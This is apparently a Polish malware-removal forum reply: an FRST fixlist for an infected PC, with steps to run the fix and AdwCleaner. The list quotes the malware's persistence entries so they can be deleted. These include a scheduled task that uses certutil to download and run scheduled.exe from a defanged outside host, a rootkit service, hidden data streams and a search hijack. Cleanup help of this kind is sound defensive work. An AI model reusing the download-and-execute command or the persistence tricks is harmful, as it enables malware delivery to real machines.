Otwórz notatnik systemowy i wklej: ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => -> Brak pliku Task: {205F0A60-064B-4D4C-9CF6-CC466D0A1991} - \csrss -> Brak pliku <==== UWAGA Task: {3F30CC20-B3C5-4E02-9FF2-8BDEF7BB272E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/scheduled/3/scheduled.exe C:\Users\Kuba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kuba\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {734CE9B1-E439-4BED-A4A9-1306D242161C} - System32\Tasks\MRT => C:\Users\Kuba\AppData\Local\Temp\csrss\mrt.exe [2018-06-15] () <==== UWAGA Task: {8EB80958-6D34-419D-BE6C-788AA1546BFA} - System32\Tasks\{1C6EFE69-C766-4F60-A464-5BDA7399AD57} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon\nfs_uninst.exe" -d "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbon" Task: {A2EF6F6E-6566-4E1B-8A63-47C36EFB034F} - System32\Tasks\{D3041705-4CE3-4276-9183-F4F2355418F8} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RAMRush\unins000.exe" Task: {C13771E8-7778-45F6-97CB-469C61C45C87} - \AMDProcess -> Brak pliku <==== UWAGA AlternateDataStreams: C:\ProgramData:NT [40] AlternateDataStreams: C:\ProgramData:NT2 [432] AlternateDataStreams: C:\Users\All Users:NT [40] AlternateDataStreams: C:\Users\All Users:NT2 [432] AlternateDataStreams: C:\ProgramData\Application Data:NT [40] AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40] AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\ProgramData\Microsoft:efXotG05zzSzCUqi9kDcxxjh [2438] AlternateDataStreams: C:\ProgramData\Microsoft:mfUoNsXyhwJSpsZBWMs [2014] AlternateDataStreams: C:\ProgramData\Microsoft:NtrbQu2dsjIempiM22EJT9 [2058] AlternateDataStreams: C:\ProgramData\Microsoft:SoVmKoEG8Qb7mdtDDQnX28N92 [2682] AlternateDataStreams: C:\ProgramData\Microsoft:zL27CRe1GnKmL72Ns5nDyJ [1956] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432] AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [540] AlternateDataStreams: C:\Users\Kuba\Dane aplikacji:NT [40] AlternateDataStreams: C:\Users\Kuba\Dane aplikacji:NT2 [432] AlternateDataStreams: C:\Users\Kuba\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Kuba\AppData\Roaming:NT2 [432] AlternateDataStreams: C:\Users\Kuba\AppData\Local\Temp:eUyH3GhJarTRH8zsUdXb [2118] AlternateDataStreams: C:\Users\Kuba\AppData\Local\Temporary Internet Files:J8WXs4zemxCc4V8BJ [2116] HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Classes\regfile: regedit.exe "%1" <==== UWAGA HKLM-x32\...\RunOnce: [D:\mbam-chameleon-3.1.33.0\Chameleon\Windows\irbh] => cmd /C rd "D:\mbam-chameleon-3.1.33.0\Chameleon\Windows\irbh" /s/q HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => "C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe" "C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware" IFEO\dvssysreport.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\freescreenvideorecorder.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\freestudiomanager.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\premiummembershipoffer.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\uninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" GroupPolicy: Ograniczenia - Chrome <==== UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_Xk1y6O33Xx5_0ZdeAvLk_CtdIi-eWV33B8PuMy8J2FfPMlyLnKRhNN8NYs0fdzGtnTHckqlYg2xbVHfNpfXj4DR43osA,,&q={searchTerms} HKU\S-1-5-21-2599105244-4264042397-500321054-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_Xo8KG50NQCIHA64V7ZL_OGrRrv2CDHKA6O833u76l2Pw338OppECy7LIjBFokOdzWtryU-sSs-lbwPS8pvbmhc9XOL8w,, SearchScopes: HKU\S-1-5-21-2599105244-4264042397-500321054-1000 -> DefaultScope {ielnksrch} URL = CHR res: Zainfekowany resources.pak (Adware script). Przeinstaluj Chrome. <==== UWAGA CHR DefaultSearchURL: Default -> hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ1r4C4ecbNpcdKVOjnoznFZZw1jsvuMsEKtUTp9Gv1FHwJ1ZTPEKIAbI1t_etNC_XkwJvAmlzqLFmizel4JbVO3F2n14jrJCaRC3SE45yYpmZrMT_1q4IDrePYJaafMfbXk19deUn1Zk0ksCXPA7e1KyDkqA,,&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx HKLM\SYSTEM\CurrentControlSet\Services\WinmonFS <==== UWAGA (Rootkit!) S3 catchme; \??\C:\ComboFix\catchme.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X] S3 NAVENG; \??\C:\Program Files\Norton Internet Security\NortonData\22.9.1.12\Definitions\SDSDefs\20180131.002\NAVENG.SYS [X] S3 NAVEX15; \??\C:\Program Files\Norton Internet Security\NortonData\22.9.1.12\Definitions\SDSDefs\20180131.002\NAVEX15.SYS [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść).